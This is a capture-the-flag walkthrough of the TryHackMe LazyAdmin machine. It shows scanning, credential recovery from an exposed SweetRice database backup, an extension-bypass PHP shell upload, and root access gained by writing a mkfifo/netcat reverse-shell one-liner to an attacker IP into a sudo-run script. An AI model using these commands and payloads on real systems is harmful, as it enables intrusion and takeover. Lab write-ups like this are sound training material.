LazyAdmin (Try Hack Me)
Perform an Nmap scan to find services and open ports, you can use the following command in
nmap -sV <target>
Once port 80 was discovered to be open, we used the dirsearch tool for scan the directory files.
python3 dirsearch.py -u <target> -x 400,401,403
Then We opened the web browser with path “ /content ”
Following CMS Sweetrice’s discovery, we searched for an exploit to take the next action.
Go to http://IP_target/content/inc/mysql_backup
Download : mysql_bakup_20191129023059–1.5.1.sql 2019–11–29 12:30 4.7K
Check the mysql_bakup_20191129023059–1.5.1.sql data information within by using the commandline.
cd Downloads
cat mysql_bakup_20191129023059-1.5.1.sql
Decode with md5.Finally we locate the credential | manager: Password123
Then interesting with SweetRice 1.5.1 — Arbitrary File Upload
In the source code, it indicates that the path to the login page is /as
.Then go to this path directory and login.
go to media center for upload
The allowed file extensions for upload are…
Then go to upload malicious php file.
open port 1234 to listening
Upload the file
After intercepting a http request using the burpsuite application, modify the file extensions to upload is .php5 then select “Forward” button.
Finally we got the shell.
Next, we’ll move on to the privilege escalation
use sudo -l
We locate and make changes to file backup.pl.
We will executie file sh
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Replace to my ip
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f
Write the new file to rev shell
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f" > /etc/copy.sh
open netcat and wait
at revShall use commandline “sudo perl /home/itguy/backup.pl”
go back to waiting netcat and finally got root
Finally we’re got root.